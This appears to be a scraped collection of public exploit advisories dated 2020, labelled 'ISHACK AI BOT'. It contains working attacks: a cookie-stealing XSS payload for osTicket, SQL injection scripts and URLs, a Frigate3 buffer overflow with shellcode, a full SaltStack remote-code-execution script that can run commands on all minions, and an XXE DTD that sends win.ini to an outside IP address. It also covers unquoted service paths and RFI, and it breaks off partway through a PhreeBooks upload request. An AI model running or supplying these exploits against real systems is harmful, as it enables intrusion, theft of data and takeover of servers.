ISHACK AI BOT

# Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting # Author: Mehmet Kelepce / Gais Cyber Security # Date : 2020-03-24 # Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884 # Vendor: http://osticket.com # Remotely Exploitable: Yes # Dynamic Coding Language: PHP # CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L) ## this vulnerability was found by examining the source code. PoC : Ticket SLA Plan Name - HTTP POST REQUEST ########################################################## POST /upload/scp/slas.php?id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/upload/scp/slas.php?id=1 Content-Type: application/x-www-form-urlencoded Content-Length: 196 Connection: close Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv Upgrade-Insecure-Requests: 1 submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes= Vulnerable parameter: name Parameter file: /scp/slass.php I used the name of the SLA for any ticket. ## Risk : cookie information of the target user is obtained.

# Exploit Title: Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path # Discovery by: Minh Tuan - SunCSR # Discovery Date: 2020-05-03 # Vendor Homepage: https://getoutline.org/vi/home # Software Link : https://raw.githubusercontent.com/Jigsaw-Code/outline-releases/master/client/stable/Outline-Client.exe # Tested Version: 1.3.3 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363 # Step to discover Unquoted Service Path: C:\Users\minht>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ OutlineService OutlineService C:\Program Files (x86)\Outline\OutlineService.exe C:\Users\minht>sc qc OutlineService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OutlineService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Outline\OutlineService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OutlineService DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Title: addressbook 9.0.0.1 - 'id' SQL Injection # Date: 2020-04-01 # Author: David Velazquez a.k.a. d4sh&r000 # vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download # vulnerable version: 9.0.0.1 # Discription: addressbook 9.0.0.1 time-based blind SQL injection # Tested On: Ubuntu Server 20.04 LTS # Platform: PHP # Type: webapp # Use: # addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1' #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import requests def isVulnerable(URL): """Check if the URL is vulnerable to ime-based blind SQL injection""" response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy') s=response.elapsed.total_seconds() if s>5:#I put a sleep sentence to test the bug sys.stdout.write('[+] Aplication is vulnerable!!!\n') else: sys.stdout.write('[+] Aplication NOT vulnerable\n') if __name__ == "__main__": isVulnerable(sys.argv[1])

# Exploit Title: Frigate 3.36 - Buffer Overflow (SEH) # Exploit Author: Xenofon Vassilakopoulos # Date: 2020-05-03 # Version: 3.36 # Vendor Homepage: http://www.Frigate3.com/ # Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe # Tested on: Windows 7 Professional SP1 x86 # Steps to reproduce : # 1. generate the test.txt using this exploit # 2. copy the contents of the test.txt to clipboard # 3. open Frigate3 then go to Disk -> Find Computer # 4. paste the contents to computer name # 5. calculator will execute import struct filename = 'test.txt' junk = "A"*4112 nseh = "\xeb\x1A\x90\x90" seh = struct.pack('L',0x40171c45) # pop esi # pop ebx # ret nop="\x90"*18 junk2 = "\x71\x71\x90\x90" #msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python buf = b"" buf += b"\x89\xe7\xda\xc7\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a" buf += b"\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37" buf += b"\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" buf += b"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x68\x68\x6d\x52" buf += b"\x77\x70\x63\x30\x73\x30\x35\x30\x6d\x59\x38\x65\x34" buf += b"\x71\x69\x50\x70\x64\x4c\x4b\x56\x30\x44\x70\x6e\x6b" buf += b"\x36\x32\x74\x4c\x6c\x4b\x30\x52\x76\x74\x4e\x6b\x71" buf += b"\x62\x51\x38\x64\x4f\x78\x37\x42\x6a\x45\x76\x76\x51" buf += b"\x4b\x4f\x6e\x4c\x47\x4c\x43\x51\x63\x4c\x44\x42\x36" buf += b"\x4c\x61\x30\x6f\x31\x38\x4f\x56\x6d\x45\x51\x69\x57" buf += b"\x38\x62\x6c\x32\x63\x62\x33\x67\x4e\x6b\x76\x32\x42" buf += b"\x30\x4e\x6b\x50\x4a\x75\x6c\x4c\x4b\x42\x6c\x57\x61" buf += b"\x51\x68\x6a\x43\x73\x78\x63\x31\x6a\x71\x43\x61\x6e" buf += b"\x6b\x73\x69\x37\x50\x35\x51\x78\x53\x6e\x6b\x42\x69" buf += b"\x65\x48\x4a\x43\x36\x5a\x51\x59\x4e\x6b\x46\x54\x4c" buf += b"\x4b\x53\x31\x69\x46\x70\x31\x49\x6f\x4c\x6c\x4f\x31" buf += b"\x48\x4f\x66\x6d\x45\x51\x4f\x37\x66\x58\x49\x70\x63" buf += b"\x45\x5a\x56\x36\x63\x73\x4d\x7a\x58\x65\x6b\x63\x4d" buf += b"\x34\x64\x44\x35\x4a\x44\x63\x68\x4c\x4b\x33\x68\x44" buf += b"\x64\x66\x61\x38\x53\x52\x46\x4e\x6b\x34\x4c\x50\x4b" buf += b"\x6e\x6b\x43\x68\x75\x4c\x76\x61\x6e\x33\x4e\x6b\x55" buf += b"\x54\x6e\x6b\x53\x31\x38\x50\x4f\x79\x43\x74\x37\x54" buf += b"\x76\x44\x51\x4b\x31\x4b\x53\x51\x36\x39\x50\x5a\x32" buf += b"\x71\x79\x6f\x79\x70\x43\x6f\x53\x6f\x52\x7a\x4e\x6b" buf += b"\x67\x62\x48\x6b\x4e\x6d\x43\x6d\x72\x4a\x47\x71\x6e" buf += b"\x6d\x4d\x55\x4e\x52\x57\x70\x37\x70\x67\x70\x62\x70" buf += b"\x32\x48\x70\x31\x6e\x6b\x32\x4f\x6c\x47\x39\x6f\x69" buf += b"\x45\x4d\x6b\x58\x70\x4e\x55\x4d\x72\x51\x46\x30\x68" buf += b"\x4e\x46\x6f\x65\x4d\x6d\x6d\x4d\x6b\x4f\x39\x45\x45" buf += b"\x6c\x33\x36\x53\x4c\x37\x7a\x4b\x30\x49\x6b\x49\x70" buf += b"\x32\x55\x45\x55\x6d\x6b\x33\x77\x44\x53\x42\x52\x50" buf += b"\x6f\x43\x5a\x67\x70\x33\x63\x4b\x4f\x59\x45\x42\x43" buf += b"\x65\x31\x52\x4c\x45\x33\x35\x50\x41\x41" payload = junk + nseh + seh + nop + junk2 + buf print "[+] Creating file %s" % filename with open(filename, 'w') as f: f.write(payload) print " File created, wrote %d bytes to file" % len(payload)

# Title: Fishing Reservation System 7.5 - 'uid' SQL Injection # Author: Vulnerability Laboratory # Date: 2020-05-05 # Vendor: https://fishingreservationsystem.com/index.html # Software: https://fishingreservationsystem.com/features.htm # CVE: N/A Document Title: =============== Fishing Reservation System - Multiple Remote SQL Injection Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2243 Common Vulnerability Scoring System: ==================================== 7.5 Product & Service Introduction: =============================== (Copy of the Homepage: https://fishingreservationsystem.com/index.html & https://fishingreservationsystem.com/features.htm ) Vulnerability Disclosure Timeline: ================================== 2020-05-04: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ Multiple remote sql-injection web vulnerabilities has been discovered in the official Fishing Reservation System application. The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or file system of the application. The remote sql injection web vulnerabilites are located in the pid, type and uid parameters of the admin.php control panel file. Guest accounts or low privileged user accounts are able to inject and execute own malicious sql commands as statement to compromise the local database and affected management system. The request method to inject/execute is GET and the attack vector is client-side. The vulnerability is a classic order by remote sql injection web vulnerability. Exploitation of the remote sql injection vulnerability requires no user interaction and a low privileged web-application user / guest account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable File(s): [+] cart.php [+] calender.php [+] admin.php Vulnerable Parameter(s): [+] uid [+] pid [+] type [+] m [+] y [+] code Proof of Concept (PoC): ======================= The remote sql-injection web vulnerability can be exploited by remote attackers with guest access or low privileged user account and without user interaction action. For security demonstration or to reproduce the remote sql injection web vulnerability follow the provided information and steps below to continue. PoC: Example https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid='[SQL-INJECTION!]-- https://frs.localhost:8080/system/admin.php?page=product/edit&type='[SQL-INJECTION!]-- https://frs.localhost:8080/system/admin.php?page=user/edit&uid='[SQL-INJECTION!]--&PHPSESSID= - https://frs.localhost:8080/system/calendar.php?m='[SQL-INJECTION!]--&y=20&PHPSESSID= https://frs.localhost:8080/system/calendar.php?m=02&y='[SQL-INJECTION!]--&PHPSESSID= https://frs.localhost:8080/system/modules/cart.php?code='[SQL-INJECTION!]--&PHPSESSID= PoC: Exploitation (SQL-Injection) https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID= https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= - https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID= https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= PoC: Exploit <html> <head><body> <title>Fishing Reservation System - SQL INJECTION EXPLOIT (PoC)</title> <iframe src="https://frs.localhost:8080/system/admin.php?page=product/edit&type=s& pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20> <iframe src="https://frs.localhost:8080/system/admin.php?page=product/edit& type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID="%20> <iframe src="https://frs.localhost:8080/system/admin.php?page=user/edit& uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20> <br>- <iframe src="https://frs.localhost:8080/system/calendar.php? m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID="%20> <iframe src="https://frs.localhost:8080/system/calendar.php?m=02& y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20> <iframe src="https://frs.localhost:8080/system/modules/cart.php? code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20> </body></head> </html> Reference(s): https://frs.localhost:8080/ https://frs.localhost:8080/system/ https://frs.localhost:8080/system/modules/ https://frs.localhost:8080/system/admin.php https://frs.localhost:8080/system/modules/cart.php Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path # Discovery by: Nguyen Khang - SunCSR # Discovery Date: 2020-05-03 # Vendor Homepage: https://www.oracle.com/ # Software Link: https://www.oracle.com/database/technologies/112010-win64soft.html # Tested Version: 11g release 2 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363 # Step to discover Unquoted Service Path: C:\Users\cm0s>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ OracleDBConsoleorcl OracleDBConsoleorcl C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe Auto OracleOraDb11g_home1TNSListener OracleOraDb11g_home1TNSListener C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR Auto OracleServiceORCL OracleServiceORCL c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL Auto C:\Users\cm0s>sc qc OracleDBConsoleorcl [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleDBConsoleorcl TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OracleDBConsoleorcl DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\cm0s>sc qc OracleOraDb11g_home1TNSListener [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleOraDb11g_home1TNSListener TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OracleOraDb11g_home1TNSListener DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\cm0s>sc qc OracleServiceORCL [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleServiceORCL TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OracleServiceORCL DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert # their code in the system root path # undetected by the OS or other security applications where it could # potentially be executed during # application startup or reboot. If successful, the local user's code would # execute with the elevated # privileges of the application.

# Exploit Title: Online Scheduling System 1.0 - 'username' SQL Injection # Date: 2020-05-04 # Exploit Author: Saurav Shukla # Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: username # Injected Request POST /oss/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost Connection: close Referer: http://localhost/oss/Register.php Cookie: PHPSESSID=091v1e2g6109rrbduk924psea9 Upgrade-Insecure-Requests: 1 username=admin' and sleep(50)--+&password=admin&lgn=Add

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access # Date: 2020-05-01 # Author: Besim ALTINOK # Vendor Homepage: http://www.weberp.org # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15.1 # Tested on: Xampp # Credit: İsmail BOZKURT -------------------------------------------------------------------------- About Software: webERP is a complete web-based accounting and business management system that requires only a web-browser and pdf reader to use. It has a wide range of features suitable for many businesses particularly distributed businesses in wholesale, distribution, and manufacturing. ------------------------------------------------------- PoC Unauthenticated Backup File Access --------------------------------------------- 1- This file generates new Backup File: http://localhost/webERP/BackUpDatabase.php 2- Someone can download the backup file from: -- http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz

# Exploit Title: Saltstack 3000.1 - Remote Code Execution # Date: 2020-05-04 # Exploit Author: Jasper Lievisse Adriaanse # Vendor Homepage: https://www.saltstack.com/ # Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* # Tested on: Debian 10 with Salt 2019.2.0 # CVE : CVE-2020-11651 and CVE-2020-11652 # Discription: Saltstack authentication bypass/remote code execution # # Source: https://github.com/jasperla/CVE-2020-11651-poc # This exploit is based on this checker script: # https://github.com/rossengeorgiev/salt-security-backports #!/usr/bin/env python # # Exploit for CVE-2020-11651 and CVE-2020-11652 # Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc) # This exploit is based on this checker script: # https://github.com/rossengeorgiev/salt-security-backports from __future__ import absolute_import, print_function, unicode_literals import argparse import datetime import os import os.path import sys import time import salt import salt.version import salt.transport.client import salt.exceptions def init_minion(master_ip, master_port): minion_config = { 'transport': 'zeromq', 'pki_dir': '/tmp', 'id': 'root', 'log_level': 'debug', 'master_ip': master_ip, 'master_port': master_port, 'auth_timeout': 5, 'auth_tries': 1, 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) } return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') # --- check funcs ---- def check_connection(master_ip, master_port, channel): print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='') sys.stdout.flush() # connection check try: channel.send({'cmd':'ping'}, timeout=2) except salt.exceptions.SaltReqTimeoutError: print("OFFLINE") sys.exit(1) else: print("ONLINE") def check_CVE_2020_11651(channel): print("[+] Checking if vulnerable to CVE-2020-11651... ", end='') sys.stdout.flush() try: rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) except: print('ERROR') return None else: pass finally: if rets: print('YES') root_key = rets[2]['root'] return root_key print('NO') return None def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): print("[+] Checking if vulnerable to CVE-2020-11652 (read_token)... ", end='') sys.stdout.flush() # try read file msg = { 'cmd': 'get_token', 'arg': [], 'token': top_secret_file_path, } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("YES") except: print("ERROR") raise else: if debug: print() print(rets) print("NO") def check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key): print("[+] Checking if vulnerable to CVE-2020-11652 (read)... ", end='') sys.stdout.flush() # try read file msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.read', 'path': top_secret_file_path, 'saltenv': 'base', } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("TIMEOUT") except: print("ERROR") raise else: if debug: print() print(rets) if rets['data']['return']: print("YES") else: print("NO") def check_CVE_2020_11652_write1(debug, channel, root_key): print("[+] Checking if vulnerable to CVE-2020-11652 (write1)... ", end='') sys.stdout.flush() # try read file msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.write', 'path': '../../../../../../../../tmp/salt_CVE_2020_11652', 'data': 'evil', 'saltenv': 'base', } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("TIMEOUT") except: print("ERROR") raise else: if debug: print() print(rets) pp(rets) if rets['data']['return'].startswith('Wrote'): try: os.remove('/tmp/salt_CVE_2020_11652') except OSError: print("Maybe?") else: print("YES") else: print("NO") def check_CVE_2020_11652_write2(debug, channel, root_key): print("[+] Checking if vulnerable to CVE-2020-11652 (write2)... ", end='') sys.stdout.flush() # try read file msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'config.update_config', 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652', 'yaml_contents': 'evil', 'saltenv': 'base', } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("TIMEOUT") except: print("ERROR") raise else: if debug: print() print(rets) if rets['data']['return'].startswith('Wrote'): try: os.remove('/tmp/salt_CVE_2020_11652.conf') except OSError: print("Maybe?") else: print("YES") else: print("NO") def pwn_read_file(channel, root_key, path, master_ip): print("[+] Attemping to read {} from {}".format(path, master_ip)) sys.stdout.flush() msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.read', 'path': path, 'saltenv': 'base', } rets = channel.send(msg, timeout=3) print(rets['data']['return'][0][path]) def pwn_upload_file(channel, root_key, src, dest, master_ip): print("[+] Attemping to upload {} to {} on {}".format(src, dest, master_ip)) sys.stdout.flush() try: fh = open(src, 'rb') payload = fh.read() fh.close() except Exception as e: print('[-] Failed to read {}: {}'.format(src, e)) return msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.write', 'saltenv': 'base', 'data': payload, 'path': dest, } rets = channel.send(msg, timeout=3) print('[ ] {}'.format(rets['data']['return'])) def pwn_exec(channel, root_key, cmd, master_ip, jid): print("[+] Attemping to execute {} on {}".format(cmd, master_ip)) sys.stdout.flush() msg = { 'key': root_key, 'cmd': 'runner', 'fun': 'salt.cmd', 'saltenv': 'base', 'user': 'sudo_user', 'kwarg': { 'fun': 'cmd.exec_code', 'lang': 'python', 'code': "import subprocess;subprocess.call('{}',shell=True)".format(cmd) }, 'jid': jid, } try: rets = channel.send(msg, timeout=3) except Exception as e: print('[-] Failed to submit job') return if rets.get('jid'): print('[+] Successfully scheduled job: {}'.format(rets['jid'])) def pwn_exec_all(channel, root_key, cmd, master_ip, jid): print("[+] Attemping to execute '{}' on all minions connected to {}".format(cmd, master_ip)) sys.stdout.flush() msg = { 'key': root_key, 'cmd': '_send_pub', 'fun': 'cmd.run', 'user': 'root', 'arg': [ "/bin/sh -c '{}'".format(cmd) ], 'tgt': '*', 'tgt_type': 'glob', 'ret': '', 'jid': jid } try: rets = channel.send(msg, timeout=3) except Exception as e: print('[-] Failed to submit job') return finally: if rets == None: print('[+] Successfully submitted job to all minions.') else: print('[-] Failed to submit job') def main(): parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652') parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1') parser.add_argument('--port', '-p', dest='master_port', default='4506') parser.add_argument('--force', '-f', dest='force', default=False, action='store_false') parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true') parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true') parser.add_argument('--read', '-r', dest='read_file') parser.add_argument('--upload-src', dest='upload_src') parser.add_argument('--upload-dest', dest='upload_dest') parser.add_argument('--exec', dest='exec', help='Run a command on the master') parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions') args = parser.parse_args() print("[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.") time.sleep(1) # Both src and destination are required for uploads if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None): print('[-] Must provide both --upload-src and --upload-dest') sys.exit(1) channel = init_minion(args.master_ip, args.master_port) check_connection(args.master_ip, args.master_port, channel) root_key = check_CVE_2020_11651(channel) if root_key: print('[*] root key obtained: {}'.format(root_key)) else: print('[-] Failed to find root key...aborting') sys.exit(127) if args.run_checks: # Assuming this check runs on the master itself, create a file with "secret" content # and abuse CVE-2020-11652 to read it. top_secret_file_path = '/tmp/salt_cve_teta' with salt.utils.fopen(top_secret_file_path, 'w') as fd: fd.write("top secret") # Again, this assumes we're running this check on the master itself with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd: root_key = keyfd.read() check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path) check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key) check_CVE_2020_11652_write1(debug, channel, root_key) check_CVE_2020_11652_write2(debug, channel, root_key) os.remove(top_secret_file_path) sys.exit(0) if args.read_file: pwn_read_file(channel, root_key, args.read_file, args.master_ip) if args.upload_src: if os.path.isabs(args.upload_dest): print('[-] Destination path must be relative; aborting') sys.exit(1) pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip) jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow()) if args.exec: pwn_exec(channel, root_key, args.exec, args.master_ip, jid) if args.exec_all: print("[!] Lester, is this what you want? Hit ^C to abort.") time.sleep(2) pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid) if __name__ == '__main__': main()

# Title: BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection # Author: Daniel Martinez Adan (aDoN90) # Date: 2020-05-01 # Homepage: https://blogengine.io/ # Software Link: https://blogengine.io/support/download/ # Affected Versions: 3.3 # Vulnerability: XML External Entity (XXE OOB) Injection Vulnerability # Severity: High # Status: Fixed # Author: Daniel Martinez Adan (aDoN90) # CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H Technical Details -------------------- Url: http://websiteurl-blogengine3.3/syndication.axd Parameter Name: apml Parameter Type: GET *Attack Pattern 1 (SSRF HTTP Interaction) :* http://websiteurl-blogengine3.3/syndication.axd?apml=http://hav4zt9bu9ihxzvcg59lqfapzg5it7.burpcollaborator.net *Attack Pattern 2 (SSRF to XXE HTTP Interaction):* http://b5baa301-b569-4bbf-afd9-d2eb264fdcbf.gdsdemo.com/blog/syndication.axd?apml=http://attackerip:8000/miau.txt miau.txt ----------------------------- <!DOCTYPE foo SYSTEM " ">http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net"> <http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net> ----------------------------- [image: image.png] *Attack Pattern 3 (SSRF to XXE Exfiltration):* miau.txt ----------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://37.187.112.19:8000/test1.dtd"> %sp; %param1; %exfil; ]> ----------------------------- test1.dtd ----------------------------- <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM ' http://y76a7hgbrccuyclwxwcp3br74yayyn.burpcollaborator.net/?%data;'>"> -----------------------------

# Title: SimplePHPGal 0.7 - Remote File Inclusion # Author: h4shur # date:2020-05-05 # Vendor Homepage: https://johncaruso.ca # Software Link: https://johncaruso.ca/phpGallery/ # Software Link: https://sourceforge.net/projects/simplephpgal/ # Tested on: Windows 10 & Google Chrome # Category : Web Application Bugs # Dork : intext:"Created with Simple PHP Photo Gallery" intext:"Created by John Caruso" ### Note: * Another web application bug is the RFI bug, which can be very dangerous And stands for Remote File Inclusion, which directly executes loose scripts on the server Also, this security hole is created by programmer errors And you must be fluent in programming language to secure and prevent this bug And you have to control the inputs of the application and use powerful firewalls * This bug is one of the most dangerous bugs and the access that the intruder can gain using this bug is the implementation of Shell script In fact, by running Shell script, it will have relatively complete access to the Target site server If we want to explain it in text, the hacker will execute the shell by giving a link from Shell script in txt format to the input of the vulnerable site. * what's the solution ? Check the file entered by the user from a list and enter it if the file was in the list. Example : <?php $files=array('test.gif'); if(in_array($_GET['file'], $files)){ include ($_GET['file']); } ?> * If you are a server administrator, turn off allow_url_fopen from the file. * Or do it with the ini_set command. Only for (RFI) <?php ini_set('allow_url_fopen ', 'Off'); ?> * We can use the strpos command to check that if the address is: // http, the file will not be enclosed (it can only block RFI) <?php $strpos = strpos($_GET['url'],'http://'); if(!$strpos){ include($_GET['url']); } ?> * Using str_replace we can give the given address from two characters "/", "." Let's clean up. <?php $url=$_GET['url']; $url = str_replace("/", "", $url); $url = str_replace(".", "", $url); include($url); ?> ### Poc : [+] site.com/image.php?img= [ PAYLOAD ]

# Exploit Title: PhreeBooks ERP 5.2.5 - Remote Command Execution # Date: 2020-05-01 # Author: Besim ALTINOK # Vendor Homepage: https://www.phreesoft.com/ # Software Link: https://sourceforge.net/projects/phreebooks/ # Version: v5.2.4, v5.2.5 # Tested on: Xampp # Credit: İsmail BOZKURT ------------------------------------------------------------------------------------- There are no file extension controls on Image Manager (5.2.4) and on Backup Restore. If an authorized user is obtained, it is possible to run a malicious PHP file on the server. -------------------------------------------------------------------------------------- One of the Vulnerable File: (backup.php) ----------------------------------------- RCE PoC (Upload Process) -------------------------------------------------------------------------------------- POST /pblast/index.php?&p=bizuno/backup/uploadRestore HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ********************* Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 